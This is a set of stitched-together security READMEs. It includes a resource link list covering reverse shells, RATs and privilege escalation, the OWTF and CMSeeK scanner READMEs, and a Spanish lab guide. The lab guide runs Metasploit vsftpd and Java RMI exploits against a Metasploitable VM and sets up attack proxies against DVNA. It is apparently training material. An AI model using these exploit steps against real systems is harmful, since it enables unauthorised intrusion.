[Beginners Guide to Assembly](https://www.unknowncheats.me/forum/programming-beginners/63947-reverse-engineering-beginners-guide-x86-assembly-and-debugging-windows-apps.html) | This guide will explain exactly what is necessary to begin cheat creation for generally any online computer game, including both fields to study, and tools to use.
[Beginner Reverse Engineering Info](https://www.reddit.com/r/ReverseEngineering/comments/hg0fx/a_modest_proposal_absolutely_no_babies_involved/) | Reddit collection of beginner information on getting into Reverse Engineering.
[Building a Home Lab for Offensive Security](https://systemoverlord.com/2017/10/24/building-a-home-lab-for-offensive-security-basics.html) | Guide on how to build a home lab for security purposes.
[Ghidra Simple Keygen Generation](https://www.youtube.com/watch?v=9SM4IvBFxK8) | From installing ghidra on ubuntu to writing a working keygen in python.
[Ghidra Tutorial](https://www.youtube.com/channel/UCzw-AibbXjw7gcdaeN3Y6kA) | Youtube playlist on how to use ghidra using different example files.
[Guide to x86 Assembly](http://www.cs.virginia.edu/~evans/cs216/guides/x86.html) | This guide describes the basics of 32-bit x86 assembly language programming, covering a small but useful subset of the available instructions and assembler directives.
[Guide to Assmebly in VS .NET](http://www.cs.virginia.edu/~evans/cs216/guides/vsasm.html) | This tutorial explains how to use assembly code in a Visual Studio .NET project.
[How to start out in Reverse Engineering](https://www.reddit.com/r/ReverseEngineering/comments/12ajwc/how_to_start_out_in_reverse_engineering/) | Reddit post on the steps to get started in Reverse Engineering.
[IDA Pro Tutorial](https://www.youtube.com/playlist?list=PLt9cUwGw6CYG2kmL5n6dFgi4wKMhgLNd7) | Tutorial on how to reverse engineer with IDA Pro.
[Intel 64 and IA32 Software Manual](https://software.intel.com/sites/default/files/managed/39/c5/325462-sdm-vol-1-2abcd-3abcd.pdf) | This document contains all four volumes of the Intel 64 and IA-32 Architectures Software Developer's Manual.
[Intermediate x86](https://opensecuritytraining.info/IntermediateX86.html) | Intermediate Intel x86: Architecture, Assembly, Applications, & Alliteration. Part 2 to Into to x86.
[Intro to Malware Analysis and Reverse Engineering](https://www.cybrary.it/course/malware-analysis/) | Malware analysis course to learn how to perform dynamic and static analysis on all major files types, how to carve malicious executables from documents and how to recognize common malware tactics and debug and disassemble malicious binaries.
[Intro to x86](https://opensecuritytraining.info/IntroX86.html) | Introductory Intel x86: Architecture, Assembly, Applications, & Alliteration.
[Malware Analysis Tutorial](http://fumalwareanalysis.blogspot.com/p/malware-analysis-tutorials-reverse.html) | Malware Analysis Tutorials: a Reverse Engineering Approach.
[Mastering Ghidra](https://vimeo.com/335158460) | Video from Infiltrate 2019 on mastering Ghidra.
[Myne-US](http://www.myne-us.com/2010/08/from-0x90-to-0x4c454554-journey-into.html) | From 0x90 to 0x4c454554, a journey into exploitation.
[Reverse Engineering 101](https://vimeo.com/6764570) | Vimeo video by Dan Guido
[Reverse Engineering 101 - Malware Unicorn](https://malwareunicorn.org/workshops/re101.html#0) | Malwareunicorn.org provides workshops and resources for reverse engineering in the infosec space. Workshop content is now available.
[Reverse Engineering 102](https://vimeo.com/30594548) | Vimeo video by Dan Guido
[Reversing for Newbies](https://forum.tuts4you.com/files/file/1307-lenas-reversing-for-newbies/) | A collection of tutorials aimed particularly for newbie reverse engineers.
[RE Guide for beginners](https://0x00sec.org/t/re-guide-for-beginners-methodology-and-tools/2242) | Methodology and Tools of reverse engineering.
[So you want to be a Malware Analyst](https://blog.malwarebytes.com/security-world/2012/09/so-you-want-to-be-a-malware-analyst/) | Malwarebytes blog on becomming a malware analyst and what all is involved.
[Windows oneliners to download and execute code](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/) | Oneliners for executing arbitrary command lines and eventually compromising a system.
[Where to start in leaning reverse engineering](https://news.ycombinator.com/item?id=7143186) | Forum post detailing the process to start learning reverse engineering.
**Privilege Escalation** |
[Basic Linux Privilege Escalation](https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/) | Blog teaching the basics of Linux Privelege Escalation.
[Linux Privilege Escalation Techniques](https://www.sans.org/reading-room/whitepapers/linux/paper/37562) | SANS papers on the linux privilege escalation.
[Linux Privilege Escalation tools/tactics](https://guif.re/linuxeop) | List of different linux privilege escalation tools and techniques as well as several scripts to download to automate the process.
[Windows Privilege Escalation](https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/) | Guide on techniques for Windows Privilege Escalation.
[LXD Privilege Escalation](https://www.hackingarticles.in/lxd-privilege-escalation/) | Describes how an account on the system that is a member of the lxd group is able to escalate the root privilege by exploiting the features of LXD.
**Shells** |
[How to build a RAT](https://www.quora.com/How-can-I-build-a-RAT-Remote-Access-Trojan-from-scratch-For-educational-purposes-only) | Building a RAT from scratch for educational purposes.
[How to create a backdoor](https://null-byte.wonderhowto.com/how-to/hack-like-pro-create-nearly-undetectable-backdoor-with-cryptcat-0149264/) | Article on how to create a nearly undetectable backdoor with Cryptcat.
[How to create a remote command shell](https://www.sans.edu/student-files/presentations/ftp_nslookup_withnotes.pdf) | Creating a remote command shell using a default windows command line tools
[How to create a reverse Shell](https://www.businessinsider.com/how-to-create-a-reverse-shell-to-remotely-execute-root-commands-over-any-open-port-using-netcat-or-bash-2012-1) | Article detailing how to create a reverse shell and when to do it.
[Reverse Shell in Bash](https://incognitjoe.github.io/reverse-shells-for-dummies.html) | Reverse shells in bash for Dummies by a Dummy.
**Hacking and Pentesting** |
[Pentesting Methodology](http://www.0daysecurity.com/pentest.html) | Step by step walkthough of a basic pentesting methodology.
[The Hacking Process](https://bitvijays.github.io) | Lots of information on the hacking process.
[Guide to Penetration Testing](https://www.varonis.com/blog/varonis-six-part-guide-to-penetration-testing/) | Varonis Seven Part Guide to Penetration Testing.
**CTF** |
[CTF Field Guide](https://trailofbits.github.io/ctf/) | How to get started in CTFs
### Books and Cheatsheets
Name | Description
---- | ----
**Books** |
[Programming from the Ground Up](http://nongnu.askapache.com/pgubook/ProgrammingGroundUp-1-0-booksize.pdf) | Using Linux assembly language to teach new programmers the most important concepts in programming.
**Cheatsheets** |
[DFIR Infographics](https://www.dfir.training/infographics-cheats) | Infographics about various DFI topics including file info, volume info, attribute info.
[General DFIR](https://www.dfir.training/general-dfir) | Cheatsheets for general dfir info.
[Malware Analysis](https://www.dfir.training/malware-cheats) | Cheatsheets for different aspects of malware analysis.
[Memory Forensics](https://www.dfir.training/memory-cheats) | Cheatsheets for memory forensics. SANS memory forensics.
[OSINT](https://www.dfir.training/osint-cheats) | Cheatsheets for OSINT strategies and tools.
[Pentesting Tools Cheatsheet](https://highon.coffee/blog/penetration-testing-tools-cheat-sheet/) | A quick reference high level overview.
[Radare2 Cheatsheet](https://scoding.de/uploads/r2_cs.pdf) | Cheatsheet of common commands for program Radare2
[Reverse Shell Cheatsheet](http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet) | Several different types of reverse shells
[SANS DFIR](https://digital-forensics.sans.org/community/cheat-sheets) | Digital Forensics and Incident Response cheatsheets from SANS.
[SANS Pentest Posters](https://www.sans.org/security-resources/posters/pen-testing) | These are Pentesting Posters that SANS supplies.
[SANS Cheatsheets](https://www.danielowen.com/2017/01/01/sans-cheat-sheets/) | Various SANS cheatsheets.
[THC Favorite tips, tricks and hacks](https://github.com/hackerschoice/thc-tips-tricks-hacks-cheat-sheet) | Various tips & tricks for typical penetration testing engagements from highon.coffee.
[Volatility Command Reference](https://github.com/volatilityfoundation/volatility/wiki/Command-Reference) | Quick reference command list for Volatility.
[Windows Post Exploitation Command List](http://www.handgrep.se/repository/cheatsheets/postexploitation/WindowsPost-Exploitation.pdf) | Quick Reference command list used in post-exploitation of windows machines.
[Windows Registry Forensics](https://www.dfir.training/registry-cheats) | Cheatsheets on windows registry for different tools and information.
[x86 and and64 instruction reference](https://www.felixcloutier.com/x86/) | Reference for instructions with included summary of each.
### Podcasts
Name | Description
---- | ----
[7 Minute Security](https://7ms.us) | A weekly infosec podcast about pentesting, blue teaming and building a career in security.
[Hackable?](https://hackablepodcast.com) | Hackable? gives us a front row seat to explore where we’re vulnerable in our daily routines, without even realizing it.
[InfoSec ICU](https://www.stitcher.com/show/infosec-icu) | The Health Information Security podcast from the Medical University of South Carolina.
[Malicious Life](https://malicious.life) | Malicious Life by Cybereason tells the unknown stories of the history of cybersecurity, with comments and reflections by real hackers, security experts, journalists, and politicians.
[Risky Business](https://risky.biz) | Risky Business podcast features news and in-depth commentary from security industry luminaries.
[SANS Internet Stormcenter Daily Network/Cyber Security and Information Security Stormcast](https://isc.sans.edu/podcast.html) | A brief daily summary of what is important in cyber security.
[Security Now!](https://twit.tv/shows/security-now) | Security podcast with Steve Gibson and Leo Laporte.
[The CyberWire Daily](https://thecyberwire.com/podcasts/daily-podcast) | The daily cybersecurity news and analysis industry leaders depend on.
### Documentation
Name | Description
---- | ----
[Security Policy Templates](https://www.sans.org/information-security-policy/) | SANS has developed and posted here a set of security policy templates for your use.
### Programming
Name | Description
---- | ----
**C**|
[Learn C](https://www.learn-c.org) | Free interactive C tutorial.
**Python**
[Learn Python](https://www.learnpython.org) | Free Python tutorial.
### Industrial Control System Info
Name | Description
---- | ----
**Learning Materials** |
[Getting Started in ICS](http://www.robertmlee.org/a-collection-of-resources-for-getting-started-in-icsscada-cybersecurity/) | A Collection of Resources for Getting Started in ICS/SCADA Cybersecurity.
[SCADA Hacking](https://www.hackers-arise.com/scada-hacking) | Information on how to hack ICS/SCADA devices.
**Tools** |
[Cronpot](https://github.com/mushorg/conpot) | ICS/SCADA honeypot.
[ICS Security Tools](https://github.com/iti/ics-security-tools) | Tools, tips, tricks, and more for exploring ICS Security.
# Contributing
Your contributions are always welcome! Please take a look at the [contribution guidelines](https://github.com/Johnson90512/Awesome-Security-Resources/blob/main/contributing.md) first.
- - -
If you have any question about this opinionated list, do not hesitate to contact me [@johnson90512](https://twitter.com/johnson90512) on Twitter or open an issue on GitHub.
|
# Offensive Web Testing Framework
![Build staus](https://github.com/owtf/owtf/actions/workflows/main.yml/badge.svg)
[![License (3-Clause
BSD)](https://img.shields.io/badge/license-BSD%203--Clause-blue.svg?style=flat-square)](http://opensource.org/licenses/BSD-3-Clause)
[![python_3.6](https://img.shields.io/badge/python-3.6-blue.svg)](https://www.python.org/downloads/)
[![python_3.7](https://img.shields.io/badge/python-3.7-blue.svg)](https://www.python.org/downloads/)
[![python_3.8](https://img.shields.io/badge/python-3.8-blue.svg)](https://www.python.org/downloads/)
**OWASP OWTF** is a project focused on penetration testing efficiency
and alignment of security tests to security standards like the OWASP
Testing Guide (v3 and v4), the OWASP Top 10, PTES and NIST so that
pentesters will have more time to
- See the big picture and think out of the box
- More efficiently find, verify and combine vulnerabilities
- Have time to investigate complex vulnerabilities like business
logic/architectural flaws or virtual hosting sessions
- Perform more tactical/targeted fuzzing on seemingly risky areas
- Demonstrate true impact despite the short timeframes we are
typically given to test.
The tool is highly configurable and anybody can trivially create simple
plugins or add new tests in the configuration files without having any
development experience.
> **Note**: This tool is however not a **silverbullet** and will only be
> as good as the person using it: Understanding and experience will be
> required to correctly interpret tool output and decide what to
> investigate further in order to demonstrate impact.
# Requirements
OWTF is developed on KaliLinux and macOS but it is made for Kali Linux
(or other Debian derivatives)
OWTF supports Python3.
## OSX pre-requisites
Dependencies: Install Homebrew (<https://brew.sh/>) and follow the steps
given below:
```{.sourceCode .bash}
$ python3 -m venv ~/.virtualenvs/owtf
$ source ~/.virtualenvs/owtf/bin/activate
$ brew install coreutils gnu-sed openssl
# We need to install 'cryptography' first to avoid issues
$ pip install cryptography --global-option=build_ext --global-option="-L/usr/local/opt/openssl/lib" --global-option="-I/usr/local/opt/openssl/include"
```
# Installation
## Running as a Docker container:
The recommended way to use OWTF is by building the Docker Image so you will not have to worry about dependencies issues and installing the various pentesting tools.
* `docker` and `docker-compose` is required. (https://docs.docker.com/compose/install/)
```
git clone https://github.com/owtf/owtf
cd owtf
make compose
```
## Installing directly
### Create and start the PostgreSQL database server
#### Using preconfigured Postgresql Docker container (Recommended)
> Please make sure you have Docker installed!
Run `make startdb` to create and start the PostgreSQL server in a Docker container. In the default configuration, it listens on port 5342 exposed from Docker container.
#### Manual setup (painful and error-prone)
> You can also use a script to this for you - find it in `scripts/db_setup.sh`. You'll need to modify any hardcoded variables if you change the corresponding ones in `owtf/settings.py`.
Start the postgreSQL server,
* macOS: `brew install postgresql` and `pg_ctl -D /usr/local/var/postgres start`
* Kali: `sudo systemctl enable postgresql; sudo systemctl start postgresql or sudo service postgresql start`
Create the `owtf_db_user` user,
* macOS: `psql postgres -c "CREATE USER $db_user WITH PASSWORD '$db_pass';"`
* Kali: `sudo su postgres -c "psql -c \"CREATE USER $db_user WITH PASSWORD '$db_pass'\""`
Create the database,
* macOS: `psql postgres -c "CREATE DATABASE $db_name WITH OWNER $db_user ENCODING 'utf-8' TEMPLATE template0;"`
* Kali: `sudo su postgres -c "psql -c \"CREATE DATABASE $db_name WITH OWNER $db_user ENCODING 'utf-8' TEMPLATE template0;\""`
### Installing OWTF
```
git clone https://github.com/owtf/owtf
cd owtf
python3 setup.py develop
owtf
open `localhost:8009` in the web browser for the OWTF web interface or `owtf --help` for all available commands.
```
# Features
- **Resilience**: If one tool crashes **OWTF**, will move on to the
next tool/test, saving the partial output of the tool until it
crashed.
- **Flexible**: Pause and resume your work.
- **Tests Separation**: **OWTF** separates its traffic to the target
into mainly 3 types of plugins:
- **Passive** : No traffic goes to the target
- **Semi Passive** : Normal traffic to target
- **Active**: Direct vulnerability probing
- Extensive REST API.
- Has almost complete OWASP Testing Guide(v3, v4), Top 10, NIST, CWE
coverage.
- **Web interface**: Easily manage large penetration engagements
easily.
- **Interactive report**:
- **Automated** plugin rankings from the tool output, fully
configurable by the user.
- **Configurable** risk rankings
- **In-line notes editor** for each plugin.
# License
Checkout [LICENSE](LICENSE.md)
# Code of Conduct
Checkout [Code of Conduct](CODE_OF_CONDUCT.md)
# Links
- [Project homepage](http://owtf.github.io/)
- [IRC](http://webchat.freenode.net/?randomnick=1&channels=%23owtf&prompt=1&uio=MTE9MjM20f)
- [Wiki](https://www.owasp.org/index.php/OWASP_OWTF)
- [Slack](https://join.slack.com/t/owasp/shared_invite/enQtNDI5MzgxMDQ2MTAwLTEyNzIzYWQ2NDZiMGIwNmJhYzYxZDJiNTM0ZmZiZmJlY2EwZmMwYjAyNmJjNzQxNzMyMWY4OTk3ZTQ0MzFhMDY) and join channel
`#project-owtf`
- [User Documentation](http://docs.owtf.org/en/latest/)
- [Youtube channel](https://www.youtube.com/user/owtfproject)
- [Slideshare](http://www.slideshare.net/abrahamaranguren/presentations)
- [Blog](http://blog.7-a.org/search/label/OWTF)
|
<p align='center'>
<img src="https://i.imgur.com/n2U6nVH.png" alt="Logo"> <br>
<img src="https://img.shields.io/badge/Version-1.0%20Beta-brightgreen.svg?style=style=flat-square" alt="version">
<img src="https://img.shields.io/badge/python-3-orange.svg?style=style=flat-square" alt="Python Version">
<img src="https://img.shields.io/aur/license/yaourt.svg?style=style=flat-square" alt="License">
</p>
## What is a CMS?
> A content management system (CMS) manages the creation and modification of digital content. It typically supports multiple users in a collaborative environment. Some noteable examples are: *WordPress, Joomla, Drupal etc*.
## Release History
```
- Version 1.0.1 [19-06-2018]
- Version 1.0.0 [15-06-2018]
```
[Changelog File](https://github.com/Tuhinshubhra/CMSeeK/blob/master/CHANGELOG)
## Functions Of CMSeek:
- Basic CMS Detection of over 20 CMS
- Advanced Wordpress Scans
- Detects Version
- Detects Users (3 Detection Methods)
- Looks for Version Vulnerabilities and much more!
- Modular bruteforce system
- Use pre made bruteforce modules or create your own and integrate with it
## Requirements and Compatibility:
CMSeeK is built using **python3**, you will need python3 to run this tool and is compitable with **unix based systems** as of now. Windows support will be added later. CMSeeK relies on **git** for auto-update so make sure git is installed.
## Installation and Usage:
It is fairly easy to use CMSeeK, just make sure you have python3 and git (just for cloning the repo) installed and use the following commands:
- git clone `https://github.com/Tuhinshubhra/CMSeeK`
- cd CMSeeK
- python3 cmseek.py
The rest should be pretty self explanotory.
## Checking For Update:
You can check for update either from the main menu or use `python3 cmseek.py --update` to check for update and apply auto update.
P.S: Please make sure you have `git` installed, CMSeeK uses git to apply auto update.
## Detection Methods:
CMSeek uses mainly 2 things for detection:
- HTTP Headers
- Page Source Code
## Supported CMSs:
CMSeeK currently can detect **22** CMSs, you can find the list on [cmss.py](https://github.com/Tuhinshubhra/CMSeeK/blob/master/cmseekdb/cmss.py) file which is present in the `cmseekdb` directory.
All the cmss are stored in the following way:
```
cmsID = {
'name':'Name Of CMS',
'url':'Official URL of the CMS',
'vd':'Version Detection (0 for no, 1 for yes)',
'deeps':'Deep Scan (0 for no 1 for yes)'
}
```
## Scan Result:
All of your scan results are stored in a json file named `cms.json`, you can find the logs inside the `Result\<Target Site>` directory, and as of the bruteforce results they're stored in a txt file under the site's result directory as well.
Here is an example of the json report log:
![Json Log](https://i.imgur.com/5dA9jQg.png)
## Bruteforce Modules:
CMSeek has a modular bruteforce system meaning you can add your custom made bruteforce modules to work with cmseek. A proper documentation for creating modules will be created shortly but in case you already figured out how to (pretty easy once you analyze the pre-made modules) all you need to do is this:
1. Add a comment exactly like this `# <Name Of The CMS> Bruteforce module`. This will help CMSeeK to know the name of the CMS using regex
2. Add another comment `### cmseekbruteforcemodule`, this will help CMSeeK to know it is a module
3. Copy and paste the module in the `brutecms` directory under CMSeeK's directory
4. Open CMSeeK and Rebuild Cache using `U` as the input in the first menu.
5. If everything is done right you'll see something like this (refer to screenshot below) and your module will be listed in bruteforce menu the next time you open CMSeeK.
<p align='center'>
<img alt="Cache Rebuild Screenshot" width="400px" src="https://i.imgur.com/2Brl7pl.png" />
</p>
## Need More Reasons To Use CMSeeK?
If not anything you can always enjoy exiting CMSeeK *(please don't)*, it will bid you goodbye in a random goodbye message in various languages.
Also you can try reading comments in the code those are pretty random and weird!!!
## Screenshots:
<p align="center">
<img alt="Main Menu" width="600px" src="https://i.imgur.com/wqOOwx0.png" />
<br><em>Main Menu</em><br>
<img alt="Scan Result" width="600px" src="https://i.imgur.com/C8SKQ1D.png" />
<br><em>Scan Result</em><br>
<img alt="WordPress Scan Result" width="600px" src="https://i.imgur.com/6xWU7W1.png" />
<br><em>WordPress Scan Result</em><br>
</p>
## Opening issue:
Please make sure you have the following info attached when opening a new issue:
- Target
- Exact copy of error or screenshot of error
- Your operating system
**Issues without these informations might not be answered!**
## Disclaimer:
**Usage of CMSeeK for testing or exploiting websites without prior mutual consistency can be considered as an illegal activity. It is the final user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program.**
## License:
CMSeeK is licensed under [GNU General Public License v3.0](https://github.com/Tuhinshubhra/CMSeeK/blob/master/LICENSE)
## Follow Me @r3dhax0r:
[Twitter](https://twitter.com/r3dhax0r) || [Facebook](https://fb.com/r3dhax0r) || [Instagram](https://instagram.com/r3dhax0r)
## About The Team:
We are the only purple team operating from India.
This is a purple team project, more projects to come in future.
[Team : Virtually Unvoid Defensive (VUD)](https://twitter.com/virtuallyunvoid)
|
# Setup para testing de API con postman y newman
![](./img/system_authentication.png)
![](./img/system_docker.png)
## Resolución de nombres
Agregar a /etc/hosts
```
127.0.0.1 api-users.smauec.net
127.0.0.1 api-rules.smauec.net
```
## Secretos
Crear archivos con credenciales
cd ~/ceiot_base/TSIOT/system
cp .env.template .env
cd secrets
cp auth.config.test.js.template auth.config.test.js
cp db.rule.config.test.js.template db.rule.config.test.js
cp db.user.config.test.js.template db.user.config.test.js
cp user.admin.config.test.js.template user.admin.config.test.js
cd ..
## Imágenes de docker
Construir todas las imagenes
cd ./docker/containers/postgres
docker build -t smauec/postgres:0.0.1 .
cd -
cd ./docker/containers/proxy
docker build -t smauec/proxy:0.0.1 .
cd -
cd ./docker/containers/node
docker build -t smauec/node:0.0.1 .
cd -
cd ./api_users
docker build -t smauec/api-users:0.0.1 .
cd -
cd ./api_rules
docker build -t smauec/api-rules:0.0.1 .
cd -
## Carga inicial de postgres
En una terminal
```
cd ~/ceiot_base/TSIOT/system
docker-compose -p repo up
```
En otra terminal
```
docker exec -it repo_postgres_1 psql -U postgres
```
Debe aparecer
```
Type "help" for help.
postgres=#
```
Copiar y pegar
```
CREATE ROLE smauec_test WITH
LOGIN
NOSUPERUSER
INHERIT
NOCREATEDB
NOCREATEROLE
NOREPLICATION
PASSWORD 'smauec_test';
CREATE DATABASE smauec_test
WITH
OWNER = smauec_test
ENCODING = 'UTF8'
LC_COLLATE = 'en_US.utf8'
LC_CTYPE = 'en_US.utf8'
TABLESPACE = pg_default
CONNECTION LIMIT = -1;
```
Salir con exit
```
postgres=# exit
```
En la terminal de docker, control-C
## Ejecución
En una terminal
```
cd ~/ceiot_base/TSIOT/system
docker-compose -p repo up
```
En otra terminal
```
wget -SqO output.json --method=POST --header='Origin: http://www.smauec.net' --header='Content-Type: application/json' --body-data='{"username":"admin","password":"admin"}' http://api-users.smauec.net/api/auth/signin
wget -SqO- --header='Origin: http://www.smauec.net' --header="x-access-token:$(jq .result.accessToken output.json | cut -b 2- | rev | cut -b2- | rev )" http://api-users.smauec.net/api/users/
```
Tiene que aparecer algo como
```
{"status":200,"message":"users list","result":[{"id":1,"username":"admin","email":"admin@samauec.org","roles":[{"id":1,"name":"admin"},{"id":2,"name":"user"}]},{"id":2,"username":"user1","email":"user1@example.org","roles":[{"id":2,"name":"user"}]},{"id":3,"username":"user2","email":"user2@example.org","roles":[{"id":2,"name":"user"}]}]}
```
## Postman
### Instalación
Descargar postman de https://www.postman.com/downloads/
Elegir dónde descomprimir y tomar nota de la ruta, por ejemplo ~/bin
tar -xzf /home/iot/snap/firefox/common/Downloads/postman-linux-x64.tar.gz
### Prueba
En una terminal
~/bin/Postman/Postman
Elegir "skip and go to the app"
```
File -> Import -> File -> Upload Files ->
~/ceiot_base/TSIOT/system/api_users/test ->
collection.json y globals.json
```
Elegir la colección importada -> run -> Run API Users
## Newman
### Instalación
sudo npm install -g newman --registry=https://registry.npmjs.org
### Prueba
cd ~/ceiot_base/TSIOT/system/api_users
npm test
Esperamos algo como
```
> smauec_ua_api@0.0.1 test
> newman run test/collection.json -g test/globals.json
...
newman
API Users
❏ Not Authenticated
↳ Create User as nobody
POST http://api-users.smauec.net/api/users [403 Forbidden, 440B, 184ms]
✓ API object
✓ Status code is coherent
✓ Status code is 403
```
El código de test no respeta la I (Isolation), pueden luego haber errores lo que no significa que haya fallado el paso.
# Setup para testing web con selenium
## Frontend a testear (falta testear bien por problemita ng)
cd ~/ceiot_base/TSIOT/system/frontend
npm install
npm start
Con firefox acceder a http://localhost:4200, ver que se puede hacer login, cerrar.
## Selenium
cd ~/ceiot_base/TSIOT/system/frontend_test
npm install
npm test
## shunit
cd ~/ceiot_base/TSIOT/shunit
./test.sh
# Setup para testing de seguridad
## testssl
sudo apt install testssl.sh
## wpscan
sudo apt install ruby-dev ubuntu-dev-tools
sudo gem install wpscan
Obtener una API KEY en https://wpscan.com/api, es conveniente guardarla en un archivo, por ejemplo wpscan.key con la forma KEY=xxxxxxx
. wpscan.key
wpscan --url $TARGET --api-token="$KEY"
## metasploit + metasploitable
Obtener la virtual de metasploitable en https://information.rapid7.com/download-metasploitable-2017.html y poner en marcha.
Obtener una virtual Kali en https://www.kali.org/get-kali/, ya sea instalando o bajando la VM y poner en marcha.
En una terminal obtener los servicios vulnerables:
nmap -v --script vuln -p 21,1099 $METASPLOITABLE_IP
En la misma u otra terminal, para el puerto 21 (ftp), explotar:
msfconsole
use exploit/unix/ftp/vsftpd_234_backdoor
set RHOSTS $METASPLOITABLE_IP
exploit
Luego, para rmi (1099) igual pero con otro exploit:
use exploit/multi/misc/java_rmi_server
Más información en https://docs.rapid7.com/metasploit/msf-overview/
## Proxies interceptores
Proyecto de referencia
docker run --name dvna -p 9090:9090 -d appsecco/dvna:sqlite
### burpsuite
Bajar de https://portswigger.net/burp/releases el primer "Stable" habiendo elegido "Community Edition" (burpsuite_community_linux_v2022_12.sh)
sh /home/iot/snap/firefox/common/Downloads/burpsuite_pro_linux_v2022_11_2.sh
Instalar en /home/iot/bin/BurpSuiteCommunity, no crear symlinks, ejecutar con:
/home/iot/bin/BurpSuiteCommunity/BurpSuiteCommunity
### zap proxy
Bajar como "linux package" de https://www.zaproxy.org/download/ (ZAP_2.12.0_Linux.tar.gz)
cd ~/bin
tar -xf /home/iot/snap/firefox/common/Downloads/ZAP_2.12.0_Linux.tar.gz
cd ZAP_2.12.0/
TMPDIR=/home/iot/ceiot_base/TSIOT/system/tmp ../BurpSuiteCommunity/jre/bin/java -jar zap-2.12.0.jar
#### Ejecución automática
```
Standard mode
URL to attack: metasploitable IP / dvna (localhost:9090)
Attack (paciencia, horas)
Report: Generate report
```
#### Ejecución manual
```
tools
options
network
server certificates
save owasp_zap_root_ca.cer
```
firefox -no-remote -ProfileManager
La primera vez:
```
new profile: zap
settings
search: proxy
network settings
manual proxy configuration
localhost:8080
no proxy for:
search: certificates
view certificates
authorities
import: owasp_zap_root_ca.cer
trust this CA to identify websites
```
```
navegar a localhost:9090
determinar contexto
```
## sonarqube
Proyecto de referencia
cd
git clone https://github.com/appsecco/dvna dvna_sources
Instalación
docker pull sonarqube
Ejecución del servidor
docker run -d --name sonarqube -e SONAR_ES_BOOTSTRAP_CHECKS_DISABLE=true -p 9000:9000 sonarqube:latest
Interacción
```
localhost:9000, paciencia....
admin admin
Create project: manually
Project name/key: test
Analyze repository: locally
Provide a token, tomar nota de lo generado (Analyze "test": sqp_9a41a579a3fdf1b80ddce02f31d5a836dbece48b)
Run analysis on your project: Other, Linux, download and unzip, Linux 64-bit
```
Ejecutar el comando ejecutado ajustando lo que haga falta
cd ~/bin
unzip ~/Downloads/sonar-scanner-cli-4.7.0.2747-linux.zip
~/bin/sonar-scanner-4.7.0.2747-linux/bin/sonar-scanner \
-Dsonar.projectKey=test \
-Dsonar.sources=/home/iot/dvna_sources \
-Dsonar.host.url=http://localhost:9000 \
-Dsonar.login=sqp_9a41a579a3fdf1b80ddce02f31d5a836dbece48b
```
http://localhost:9000/dashboard?id=test
```
|
# WEEKLY INFOSEC UPDATE : v0.4
![](https://img.shields.io/github/issues/RESETHACKER-COMMUNITY/Pentesting-Bugbounty)
![](https://img.shields.io/github/forks/RESETHACKER-COMMUNITY/Pentesting-Bugbounty)
![](https://img.shields.io/github/stars/RESETHACKER-COMMUNITY/Pentesting-Bugbounty)
![](https://img.shields.io/github/last-commit/RESETHACKER-COMMUNITY/Pentesting-Bugbounty)
Hey Hackers, Thankyou for visiting Weekly Infosec Update.
![WIUv0 4](https://user-images.githubusercontent.com/25515871/189512256-bb51318d-3d0a-41a6-b3b9-a69cd98c2f2a.png)
<details>
<summary><b>Preview</b></summary>
- 1. Events, talks & webinar.
- 2. CVE : poc exploit and analysis.
- CVE Week → Day0* — Day0* Month 2022
- 3. Bug Bounty : reports, Write-ups and Resources.
- Hackerone Report Segment:
- Bugs Analysis and write-ups segment:
- 4. Secuirty & Researchers: AppSec, Red team, Blue team, threat intelligence, Malware, Ransomware etc.
- Red, Blue & purple Team :
- Web Security, cloud misconfiguration & Android Security.
- 5. News
- DataBreach & Black Hat Hacker
- Top 5 Infosec
- Twitter threads & Tips.
- 6. Hiring & free course
- 7. Tools, framework, RAT, Ransomware and malware
- SAST/DAST/Recon/Exploit Web : * Tool
- Cloud Security : * Tool
- Blue Team : * Tool
- OSINT Tools : * Tool
- Malware Analysis : * Tool
- 10. How to get involve in Contribution ?
- 11. Source for Weekly infosec Update.
- 12. Wrapping Up. :)
</details>
---
# InfoSec community infused Weekly Update :
ID | Weekly Issue Number | Recap Week | Issued Date |
|---|---|---|---|
| 07 | [Weekly Issue 07](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/ResetCybersecuirty/Weekly_Infosec_Update(WIU)/Weekly_Infosec_Update_06.md) | 07 September 2022 - 13 September 2022 | 14 September 2022 |
| 06 | [Weekly Issue 06](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/ResetCybersecuirty/Weekly_Infosec_Update(WIU)/Weekly_Infosec_Update_05.md) | 31st August - 06 September 2022 | 07 September 2022 |
| 05 | [Weekly Issue 05](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/ResetCybersecuirty/Weekly_Infosec_Update(WIU)/Weekly_Infosec_Update_04.md) | 23rd August - 30th August 2022 | 31st August 2022 |
| 04 | [Weekly Issue 04](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/ResetCybersecuirty/Weekly_Infosec_Update(WIU)/Weekly_Infosec_Update_03.md) | 16th August - 22nd August 2022 | 23th August 2022 |
| 03 | [Weekly Issue 03](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/ResetCybersecuirty/Weekly_Infosec_Update(WIU)/Weekly_Infosec_Update_02.md) | 9th August - 15th August 2022 | 16th August 2022 |
| 02 | [Weekly Issue 02](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/ResetCybersecuirty/Weekly_Infosec_Update(WIU)/Weekly_Infosec_Update_01.md) | 2nd August - 8th August 2022 | 9th August 2022 |
| 01 | [Weekly Issue 01](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/ResetCybersecuirty/Weekly_Infosec_Update(WIU)/Weekly_Infosec_Update_00.md) | 25th July - 01st August 2022 | 02 August 2022 |
#### Remember to support us by contributing to repository and giving a Star.
#### [Community and groups that Supported Weekly Infosec Update](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/ResetCybersecuirty/SupportedBy/Readme.md)
<details>
<summary><b>Preview</b></summary>
